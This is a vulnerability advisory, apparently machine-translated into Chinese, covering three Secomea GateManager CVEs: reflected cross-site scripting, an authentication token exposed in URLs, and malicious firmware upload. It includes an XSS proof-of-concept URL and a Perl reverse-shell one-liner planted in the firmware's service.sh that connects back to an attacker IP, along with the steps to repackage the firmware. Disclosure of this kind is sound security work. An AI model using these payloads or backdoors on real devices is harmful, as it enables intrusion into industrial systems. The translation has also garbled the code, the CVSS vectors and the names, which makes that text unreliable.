Secomea GateManager多个漏洞
高剧情简介
站得住脚的发现了多个漏洞Secomea产品。我们一直建议Secomea“预计,这些漏洞影响Secomea供应商。”As we determine the list of affected vendors, we will update this page. To our current knowledge, this list includes B&R Industrial Automation GmbH.
cve - 2020 - 29028:跨站点脚本编制反映出来
CVSSv3基础分数:6.1
CVSSv3向量:AV: N /交流:L /公关:N / UI: R / S: C / C: L /我:L /答:N
在gui op的参数。cgi响应中返回没有卫生处理。可以将任意JavaScript代码将在用户的浏览器中执行在导航到的URL。
概念验证
当页面呈现以下URL, javascript执行导致消息反映xss的显示。
https://192.168.0.186/lm/cgi/gui.cgi?op= <脚本>警报(反映+ xss) < /脚本> cert = local_ca.pem
cve - 2020 - 29030:身份验证令牌暴露在URL路径
CVSSv3基础分数:8.1
CVSSv3向量:AV: N /交流:H /公关:UI: N / N / S: U / C: H /我:H: H
一旦验证Gatemanager身份验证令牌,默认情况下,暴露在所有未来POST / GET请求。这是危险的URL路径可以保存在浏览器的历史,通过其他网站引用页头,存储在web日志,或者记录在其他来源。如果URL路径包含敏感信息,比如会话标识符,那么攻击者就可以使用这些信息来发动进一步攻击。
概念验证
在下面的截图我们可以看到,我们可以访问受限页面只使用身份验证令牌附加到URL的路径。
cve - 2020 - 29032:验证恶意固件上传
CVSSv3基础分数:8.3
CVSSv3向量:AV: N /交流:H /公关:N / UI: R / S: C / C: H /我:H: H
可以上传恶意固件到设备。如果受害者服务运营商级别权限被骗上传了固件了,远程攻击者可以秘密的设备。
概念验证
作为一个概念证明我添加以下perl反向壳service.sh顶部一行程序。
perl - e '使用插座;$ i =“172.17.0.1”; p = 1234美元;插座(S PF_INET SOCK_STREAM, getprotobyname (tcp));如果(连接(年代,指向sockaddr_in ($ p, inet_aton ($ i)))){开放(STDIN, " >郑清奎");开放(STDOUT, " >郑清奎");开放(STDERR, " >郑清奎");exec (/ bin / sh - i);};”
为此我第一次提取gzip档案的更新包。
然后我打开服务。在文本编辑器中sh并添加后门。
然后重新打包的固件我运行下面的命令。
焦油-zcvf Secomea_GateManager_Installer_v9.3.620453012。tgz。
一旦上传这将导致反向壳被送回攻击者当服务已启动。
注意:复制这个本地需要提取固件的内容,修改返回后门的IP地址的服务。sh和重新打包的固件。
风险信息
Derrie萨顿